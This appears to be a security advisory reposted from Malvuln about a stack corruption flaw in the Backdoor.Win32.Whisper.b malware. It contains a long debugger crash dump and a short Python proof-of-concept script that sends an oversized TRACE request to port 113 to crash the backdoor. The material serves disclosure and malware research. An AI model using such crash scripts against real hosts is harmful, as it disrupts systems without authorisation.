Backdoor.Win32.Whisper.b / Remote Stack Corruption

2021.01.20
us malvuln (US) us
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/a0edb91f62c8c083ec35b32a922168d1.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Whisper.b Vulnerability: Remote Stack Corruption Description: Whisper.b listens on TCP port 113 and connects to port 6667, deletes itself drops executable named rundll32.exe in Windows\System dir. The malware is prone to stack corruption issues when receiving unexpected characters of random sizes. Type: PE32 MD5: a0edb91f62c8c083ec35b32a922168d1 Vuln ID: MVID-2021-0039 Dropped files: rundll32.exe ASLR: False DEP: False Safe SEH: True Disclosure: 01/19/2021 Memory Dump: (1afc.1284): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=e026bf39 edx=00000000 esi=00000003 edi=00000003 eip=773ced3c esp=04a4f65c ebp=04a4f7ec iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206 ntdll!ZwWaitForMultipleObjects+0xc: 773ced3c c21400 ret 14h 0:005> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** WARNING: Unable to verify checksum for rundll32.exe *** ERROR: Module load completed but symbols could not be loaded for rundll32.exe Failed calling InternetOpenUrl, GLE=12029 FAULTING_IP: +2f e48240ad ?? ??? EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: e48240ad ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: e48240ad Attempt to read from address e48240ad PROCESS_NAME: rundll32.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: e48240ad READ_ADDRESS: e48240ad FOLLOWUP_IP: ntdll!__RtlUserThreadStart+2f 773c4a77 e988ed0300 jmp ntdll!__RtlUserThreadStart+0x3edbc (77403804) FAILED_INSTRUCTION_ADDRESS: +2f e48240ad ?? ??? MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 LAST_CONTROL_TRANSFER: from 773c4a77 to e48240ad FAULTING_THREAD: ffffffff BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_STACK_CORRUPTION PRIMARY_PROBLEM_CLASS: BAD_INSTRUCTION_PTR_EXPLOITABLE DEFAULT_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE IP_ON_HEAP: e48240ad The fault address in not in any loaded module, please check your build's rebase log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. STACK_TEXT: WARNING: Frame IP not in any known module. Following frames may be wrong. 04a4ff94 773c4a77 00000000 3af22017 00000000 0xe48240ad 736e6e20 cd614028 41d249d6 3dfc3391 92dff545 ntdll!__RtlUserThreadStart+0x2f 736e6e24 41d249d6 3dfc3391 92dff545 cd55d73c 0xcd614028 736e6e28 3dfc3391 92dff545 cd55d73c 4f5ef4ed 0x41d249d6 736e6e2c 92dff545 cd55d73c 4f5ef4ed 81eb06aa 0x3dfc3391 736e6e30 cd55d73c 4f5ef4ed 81eb06aa 7f29e23d 0x92dff545 736e6e34 4f5ef4ed 81eb06aa 7f29e23d cd551d8d 0xcd55d73c 736e6e38 81eb06aa 7f29e23d cd551d8d 4e19a09f 0x4f5ef4ed 736e6e3c 7f29e23d cd551d8d 4e19a09f 860534a8 0x81eb06aa 736e6e40 cd551d8d 4e19a09f 860534a8 fba5b239 0x7f29e23d 736e6e44 4e19a09f 860534a8 fba5b239 cd4e1429 0xcd551d8d 736e6e48 860534a8 fba5b239 cd4e1429 42473b1b 0x4e19a09f 736e6e4c fba5b239 cd4e1429 42473b1b f6b1c781 0x860534a8 736e6e50 cd4e1429 42473b1b f6b1c781 10d3e67d 0xfba5b239 736e6e54 42473b1b f6b1c781 10d3e67d cd3fa923 0xcd4e1429 736e6e58 f6b1c781 10d3e67d cd3fa923 46667fd6 0x42473b1b 736e6e5c 10d3e67d cd3fa923 46667fd6 4a9e6faa 0xf6b1c781 736e6e60 cd3fa923 46667fd6 4a9e6faa a4020484 0x10d3e67d 736e6e64 46667fd6 4a9e6faa a4020484 cd3306f1 0xcd3fa923 736e6e68 4a9e6faa a4020484 cd3306f1 47da0c2e 0x46667fd6 736e6e6c a4020484 cd3306f1 47da0c2e e555a9a4 0x4a9e6faa 736e6e70 cd3306f1 47da0c2e e555a9a4 05adc8fa 0xa4020484 736e6e74 47da0c2e e555a9a4 05adc8fa cd317e1a 0xcd3306f1 736e6e78 e555a9a4 05adc8fa cd317e1a 40e92213 0x47da0c2e 736e6e7c 05adc8fa cd317e1a 40e92213 19029ab0 0xe555a9a4 736e6e80 cd317e1a 40e92213 19029ab0 bae1e59b 0x5adc8fa 736e6e84 40e92213 19029ab0 bae1e59b cd277ed0 0xcd317e1a 736e6e88 19029ab0 bae1e59b cd277ed0 4f3b741b 0x40e92213 736e6e8c bae1e59b cd277ed0 4f3b741b bf22908d 0x19029ab0 736e6e90 cd277ed0 4f3b741b bf22908d 3b2b3d24 0xbae1e59b 736e6e94 4f3b741b bf22908d 3b2b3d24 cd17f8c4 0xcd277ed0 736e6e98 bf22908d 3b2b3d24 cd17f8c4 46fe8509 0x4f3b741b 736e6e9c 3b2b3d24 cd17f8c4 46fe8509 254058a4 0xbf22908d 736e6ea0 cd17f8c4 46fe8509 254058a4 3001decb 0x3b2b3d24 736e6ea4 46fe8509 254058a4 3001decb cd145a4e 0xcd17f8c4 736e6ea8 254058a4 3001decb cd145a4e 4324c135 0x46fe8509 736e6eac 3001decb cd145a4e 4324c135 e69f8e92 0x254058a4 736e6eb0 cd145a4e 4324c135 e69f8e92 b345abf4 0x3001decb 736e6eb4 4324c135 e69f8e92 b345abf4 cd11fbdc 0xcd145a4e 736e6eb8 e69f8e92 b345abf4 cd11fbdc 4b1f854b 0x4324c135 736e6ebc b345abf4 cd11fbdc 4b1f854b 6ad3aa94 0xe69f8e92 736e6ec0 cd11fbdc 4b1f854b 6ad3aa94 3c872390 0xb345abf4 736e6ec4 4b1f854b 6ad3aa94 3c872390 cd112693 0xcd11fbdc 736e6ec8 6ad3aa94 3c872390 cd112693 419dc5c2 0x4b1f854b 736e6ecc 3c872390 cd112693 419dc5c2 c5b98ea4 0x6ad3aa94 736e6ed0 cd112693 419dc5c2 c5b98ea4 a8a2743f 0x3c872390 736e6ed4 419dc5c2 c5b98ea4 a8a2743f cd043531 0xcd112693 736e6ed8 c5b98ea4 a8a2743f cd043531 4153c0d3 0x419dc5c2 736e6edc a8a2743f cd043531 4153c0d3 595b94bc 0xc5b98ea4 736e6ee0 cd043531 4153c0d3 595b94bc 5f42c9f4 0xa8a2743f 736e6ee4 4153c0d3 595b94bc 5f42c9f4 ccd78f11 0xcd043531 736e6ee8 595b94bc 5f42c9f4 ccd78f11 4f523611 0x4153c0d3 736e6eec 5f42c9f4 ccd78f11 4f523611 19c5fc80 0x595b94bc 736e6ef0 ccd78f11 4f523611 19c5fc80 7d50770a 0x5f42c9f4 736e6ef4 4f523611 19c5fc80 7d50770a ccd1e29b 0xccd78f11 736e6ef8 19c5fc80 7d50770a ccd1e29b 4cf3723e 0x4f523611 736e6efc 7d50770a ccd1e29b 4cf3723e 5793579e 0x19c5fc80 736e6f00 ccd1e29b 4cf3723e 5793579e 6b53dd4c 0x7d50770a 736e6f04 4cf3723e 5793579e 6b53dd4c cccbe7ef 0xccd1e29b 736e6f08 5793579e 6b53dd4c cccbe7ef 4b50c5a2 0x4cf3723e 736e6f0c 6b53dd4c cccbe7ef 4b50c5a2 da8387bb 0x5793579e 736e6f10 cccbe7ef 4b50c5a2 da8387bb 8405031f 0x6b53dd4c 736e6f14 4b50c5a2 da8387bb 8405031f ccc2f326 0xcccbe7ef 736e6f18 da8387bb 8405031f ccc2f326 47ed903b 0x4b50c5a2 736e6f1c 8405031f ccc2f326 47ed903b bdc41090 0xda8387bb 736e6f20 ccc2f326 47ed903b bdc41090 b419ea3e 0x8405031f 736e6f24 47ed903b bdc41090 b419ea3e ccc200e6 0xccc2f326 736e6f28 bdc41090 b419ea3e ccc200e6 42c4b62a 0x47ed903b 736e6f2c b419ea3e ccc200e6 42c4b62a fae8138c 0xbdc41090 736e6f30 ccc200e6 42c4b62a fae8138c c13f8cfb 0xb419ea3e 736e6f34 42c4b62a fae8138c c13f8cfb ccc1f553 0xccc200e6 736e6f38 fae8138c c13f8cfb ccc1f553 4f394841 0x42c4b62a 736e6f3c c13f8cfb ccc1f553 4f394841 7449f9a3 0xfae8138c 736e6f40 ccc1f553 4f394841 7449f9a3 e01900f9 0xc13f8cfb 736e6f44 4f394841 7449f9a3 e01900f9 ccc1dc5b 0xccc1f553 736e6f48 7449f9a3 e01900f9 ccc1dc5b 43bc0790 0x4f394841 736e6f4c e01900f9 ccc1dc5b 43bc0790 c8f17d9a 0x7449f9a3 736e6f50 ccc1dc5b 43bc0790 c8f17d9a d621268e 0xe01900f9 736e6f54 43bc0790 c8f17d9a d621268e ccc05de9 0xccc1dc5b 736e6f58 c8f17d9a d621268e ccc05de9 4628d666 0x43bc0790 736e6f5c d621268e ccc05de9 4628d666 26640782 0xc8f17d9a 736e6f60 ccc05de9 4628d666 26640782 869a8aeb 0xd621268e 736e6f64 4628d666 26640782 869a8aeb ccae28bc 0xccc05de9 736e6f68 26640782 869a8aeb ccae28bc 4e9d874c 0x4628d666 736e6f6c 869a8aeb ccae28bc 4e9d874c 18bfb3a4 0x26640782 736e6f70 ccae28bc 4e9d874c 18bfb3a4 4b6a2c12 0x869a8aeb 736e6f74 4e9d874c 18bfb3a4 4b6a2c12 ccac7724 0xccae28bc 736e6f78 18bfb3a4 4b6a2c12 ccac7724 404b732a 0x4e9d874c 736e6f7c 4b6a2c12 ccac7724 404b732a e34e7e97 0x18bfb3a4 736e6f80 ccac7724 404b732a e34e7e97 b347d056 0x4b6a2c12 736e6f84 404b732a e34e7e97 b347d056 ccac4ba9 0xccac7724 736e6f88 e34e7e97 b347d056 ccac4ba9 4d608700 0x404b732a 736e6f8c b347d056 ccac4ba9 4d608700 45d74286 0xe34e7e97 736e6f90 ccac4ba9 4d608700 45d74286 b6a77b95 0xb347d056 736e6f94 4d608700 45d74286 b6a77b95 cca03606 0xccac4ba9 736e6f98 45d74286 b6a77b95 cca03606 41766646 0x4d608700 736e6f9c b6a77b95 cca03606 41766646 b3f90cb2 0x45d74286 736e6fa0 cca03606 41766646 b3f90cb2 2f8f31ea 0xb6a77b95 736e6fa4 41766646 b3f90cb2 2f8f31ea cc9882c1 0xcca03606 736e6fa8 b3f90cb2 2f8f31ea cc9882c1 42897b24 0x41766646 736e6fac 2f8f31ea cc9882c1 42897b24 6a0028a1 0xb3f90cb2 736e6fb0 cc9882c1 42897b24 6a0028a1 46c8b036 0x2f8f31ea 736e6fb4 42897b24 6a0028a1 46c8b036 cc858d44 0xcc9882c1 736e6fb8 6a0028a1 46c8b036 cc858d44 4af581c3 0x42897b24 736e6fbc 46c8b036 cc858d44 4af581c3 faecc28f 0x6a0028a1 736e6fc0 cc858d44 4af581c3 faecc28f e9aecb98 0x46c8b036 736e6fc4 4af581c3 faecc28f e9aecb98 cc6f2aa6 0xcc858d44 736e6fc8 faecc28f e9aecb98 cc6f2aa6 4638c91c 0x4af581c3 736e6fcc e9aecb98 cc6f2aa6 4638c91c 1ef4e9a4 0xfaecc28f 736e6fd0 cc6f2aa6 4638c91c 1ef4e9a4 385e8c97 0xe9aecb98 736e6fd4 4638c91c 1ef4e9a4 385e8c97 cc6b27e2 0xcc6f2aa6 736e6fd8 1ef4e9a4 385e8c97 cc6b27e2 4fc68b92 0x4638c91c 736e6fdc 385e8c97 cc6b27e2 4fc68b92 29ba23b6 0x1ef4e9a4 736e6fe0 cc6b27e2 4fc68b92 29ba23b6 27b5127f 0x385e8c97 736e6fe4 4fc68b92 29ba23b6 27b5127f cc5f236c 0xcc6b27e2 736e6fe8 29ba23b6 27b5127f cc5f236c 4144a4f9 0x4fc68b92 736e6fec 27b5127f cc5f236c 4144a4f9 07085388 0x29ba23b6 736e6ff0 cc5f236c 4144a4f9 07085388 55d02d18 0x27b5127f 736e6ff4 4144a4f9 07085388 55d02d18 cc5d04d0 0xcc5f236c 736e6ff8 07085388 55d02d18 cc5d04d0 46030552 0x4144a4f9 736e6ffc 55d02d18 cc5d04d0 46030552 c3a32f81 0x7085388 736e7000 cc5d04d0 46030552 c3a32f81 30c4b360 0x55d02d18 736e7004 46030552 c3a32f81 30c4b360 cc4f0483 0xcc5d04d0 736e7008 c3a32f81 30c4b360 cc4f0483 4dcdc0cd 0x46030552 736e700c 30c4b360 cc4f0483 4dcdc0cd 6cdf1088 0xc3a32f81 736e7010 cc4f0483 4dcdc0cd 6cdf1088 fe776960 0x30c4b360 736e7014 4dcdc0cd 6cdf1088 fe776960 cc3c15b2 0xcc4f0483 736e7018 6cdf1088 fe776960 cc3c15b2 4f95c8c0 0x4dcdc0cd 736e701c fe776960 cc3c15b2 4f95c8c0 bbba8594 0x6cdf1088 736e7020 cc3c15b2 4f95c8c0 bbba8594 8caad0c1 0xfe776960 736e7024 4f95c8c0 bbba8594 8caad0c1 cc35a746 0xcc3c15b2 736e7028 bbba8594 8caad0c1 cc35a746 4673bb90 0x4f95c8c0 736e702c 8caad0c1 cc35a746 4673bb90 e10286a2 0xbbba8594 736e7030 cc35a746 4673bb90 e10286a2 1bde9afc 0x8caad0c1 736e7034 4673bb90 e10286a2 1bde9afc cc2ab78b 0xcc35a746 736e7038 e10286a2 1bde9afc cc2ab78b 43587097 0x4673bb90 736e703c 1bde9afc cc2ab78b 43587097 b417bbaa 0xe10286a2 736e7040 cc2ab78b 43587097 b417bbaa 9aa02c69 0x1bde9afc 736e7044 43587097 b417bbaa 9aa02c69 cc26c33f 0xcc2ab78b 736e7048 b417bbaa 9aa02c69 cc26c33f 41163379 0x43587097 736e704c 9aa02c69 cc26c33f 41163379 b856f991 0xb417bbaa 736e7050 cc26c33f 41163379 b856f991 34dbfe2b 0x9aa02c69 736e7054 41163379 b856f991 34dbfe2b cc20997b 0xcc26c33f 736e7058 b856f991 34dbfe2b cc20997b 470c37e8 0x41163379 736e705c 34dbfe2b cc20997b 470c37e8 d3eada87 0xb856f991 736e7060 cc20997b 470c37e8 d3eada87 439845b5 0x34dbfe2b 736e7064 470c37e8 d3eada87 439845b5 cc18eff2 0xcc20997b 736e7068 d3eada87 439845b5 cc18eff2 490f0bcc 0x470c37e8 736e706c 439845b5 cc18eff2 490f0bcc 9b5bf8ab 0xd3eada87 736e7070 cc18eff2 490f0bcc 9b5bf8ab a3fe95de 0x439845b5 736e7074 490f0bcc 9b5bf8ab a3fe95de cc135cdc 0xcc18eff2 736e7078 9b5bf8ab a3fe95de cc135cdc 45d4e588 0x490f0bcc 736e707c a3fe95de cc135cdc 45d4e588 6c919999 0x9b5bf8ab 736e7080 cc135cdc 45d4e588 6c919999 6c4993e7 0xa3fe95de 736e7084 45d4e588 6c919999 6c4993e7 cc11a7bc 0xcc135cdc 736e7088 6c919999 6c4993e7 cc11a7bc 45990818 0x45d4e588 736e708c 6c4993e7 cc11a7bc 45990818 9681eb87 0x6c919999 736e7090 cc11a7bc 45990818 9681eb87 c6be3f94 0x6c4993e7 736e7094 45990818 9681eb87 c6be3f94 cc0abbe7 0xcc11a7bc 736e7098 9681eb87 c6be3f94 cc0abbe7 4bec1d7f 0x45990818 736e709c c6be3f94 cc0abbe7 4bec1d7f 55110b83 0x9681eb87 736e70a0 cc0abbe7 4bec1d7f 55110b83 b153a1d6 0xc6be3f94 736e70a4 4bec1d7f 55110b83 b153a1d6 cc0988d1 0xcc0abbe7 736e70a8 55110b83 b153a1d6 cc0988d1 4a6b9dc9 0x4bec1d7f 736e70ac b153a1d6 cc0988d1 4a6b9dc9 ab2668be 0x55110b83 736e70b0 cc0988d1 4a6b9dc9 ab2668be 2492399f 0xb153a1d6 736e70b4 4a6b9dc9 ab2668be 2492399f cc07c3fa 0xcc0988d1 736e70b8 ab2668be 2492399f cc07c3fa 4510d5d6 0x4a6b9dc9 736e70bc 2492399f cc07c3fa 4510d5d6 fff52c96 0xab2668be 736e70c0 cc07c3fa 4510d5d6 fff52c96 6bc8d4ae 0x2492399f 736e70c4 4510d5d6 fff52c96 6bc8d4ae cc04b07d 0xcc07c3fa 736e70c8 fff52c96 6bc8d4ae cc04b07d 4b8d7df8 0x4510d5d6 736e70cc 6bc8d4ae cc04b07d 4b8d7df8 e7c036a9 0xfff52c96 736e70d0 cc04b07d 4b8d7df8 e7c036a9 bc145b66 0x6bc8d4ae 736e70d4 4b8d7df8 e7c036a9 bc145b66 cbf31bd1 0xcc04b07d 736e70d8 e7c036a9 bc145b66 cbf31bd1 4a6adeee 0x4b8d7df8 736e70dc bc145b66 cbf31bd1 4a6adeee 4896058e 0xe7c036a9 736e70e0 cbf31bd1 4a6adeee 4896058e 1dbe9ad9 0xbc145b66 736e70e4 4a6adeee 4896058e 1dbe9ad9 cbf26a30 0xcbf31bd1 736e70e8 4896058e 1dbe9ad9 cbf26a30 496fa9ba 0x4a6adeee 736e70ec 1dbe9ad9 cbf26a30 496fa9ba 00e61295 0x4896058e 736e70f0 cbf26a30 496fa9ba 00e61295 b4192c41 0x1dbe9ad9 736e70f4 496fa9ba 00e61295 b4192c41 cbee4159 0xcbf26a30 736e70f8 00e61295 b4192c41 cbee4159 4764294f 0x496fa9ba 736e70fc b4192c41 cbee4159 4764294f 1d0087ae 0xe61295 736e7100 cbee4159 4764294f 1d0087ae 37abef46 0xb4192c41 736e7104 4764294f 1d0087ae 37abef46 cbc0abbe 0xcbee4159 736e7108 1d0087ae 37abef46 cbc0abbe 46e4d0ca 0x4764294f 736e710c 37abef46 cbc0abbe 46e4d0ca 0f15eb88 0x1d0087ae 736e7110 cbc0abbe 46e4d0ca 0f15eb88 e53ce83f 0x37abef46 736e7114 46e4d0ca 0f15eb88 e53ce83f cbbabedb 0xcbc0abbe 736e7118 0f15eb88 e53ce83f cbbabedb 4efd1c66 0x46e4d0ca 736e711c e53ce83f cbbabedb 4efd1c66 273adabe 0xf15eb88 736e7120 cbbabedb 4efd1c66 273adabe 6a052189 0xe53ce83f 736e7124 4efd1c66 273adabe 6a052189 cbb4f0fd 0xcbbabedb 736e7128 273adabe 6a052189 cbb4f0fd 481edf94 0x4efd1c66 736e712c 6a052189 cbb4f0fd 481edf94 dbd7e990 0x273adabe 736e7130 cbb4f0fd 481edf94 dbd7e990 23a5fe43 0x6a052189 736e7134 481edf94 dbd7e990 23a5fe43 cbb436b0 0xcbb4f0fd 736e7138 dbd7e990 23a5fe43 cbb436b0 43728ab9 0x481edf94 736e713c 23a5fe43 cbb436b0 43728ab9 0f33358b 0xdbd7e990 736e7140 cbb436b0 43728ab9 0f33358b 865e9c98 0x23a5fe43 736e7144 43728ab9 0f33358b 865e9c98 cbb051b3 0xcbb436b0 736e7148 0f33358b 865e9c98 cbb051b3 454f9567 0x43728ab9 736e714c 865e9c98 cbb051b3 454f9567 8be331ba 0xf33358b 736e7150 cbb051b3 454f9567 8be331ba 5f16c90a 0x865e9c98 736e7154 454f9567 8be331ba 5f16c90a cbb00f6b 0xcbb051b3 736e7158 8be331ba 5f16c90a cbb00f6b 4431f230 0x454f9567 736e715c 5f16c90a cbb00f6b 4431f230 7c92388c 0x8be331ba 736e7160 cbb00f6b 4431f230 7c92388c 0580fc6c 0x5f16c90a 736e7164 4431f230 7c92388c 0580fc6c cba8ca0f 0xcbb00f6b 736e7168 7c92388c 0580fc6c cba8ca0f 4494269a 0x4431f230 736e716c 0580fc6c cba8ca0f 4494269a 64005cb9 0x7c92388c 736e7170 cba8ca0f 4494269a 64005cb9 141d3536 0x580fc6c 736e7174 4494269a 64005cb9 141d3536 cb9ef1fc 0xcba8ca0f 736e7178 64005cb9 141d3536 cb9ef1fc 46761702 0x4494269a 736e717c 141d3536 cb9ef1fc 46761702 2d7b6687 0x64005cb9 736e7180 cb9ef1fc 46761702 2d7b6687 2c STACK_COMMAND: ~5s; .ecxr ; kb SYMBOL_STACK_INDEX: 1 SYMBOL_NAME: ntdll!__RtlUserThreadStart+2f FOLLOWUP_NAME: MachineOwner MODULE_NAME: ntdll IMAGE_NAME: ntdll.dll DEBUG_FLR_IMAGE_TIMESTAMP: 3a21d961 FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_c0000005_ntdll.dll!__RtlUserThreadStart BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_STACK_CORRUPTION_BAD_IP_ntdll!__RtlUserThreadStart+2f Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=113 def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) PACKIT="TRACE /"+"A"*69666+" HTTP/1.1\r\nHost: "+"B"*32000+"\r\n\r\n" s.send(PACKIT) s.close() print("Backdoor.Win32.Whisper.b / Remote Stack Corruption") print("MD5: a0edb91f62c8c083ec35b32a922168d1") print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top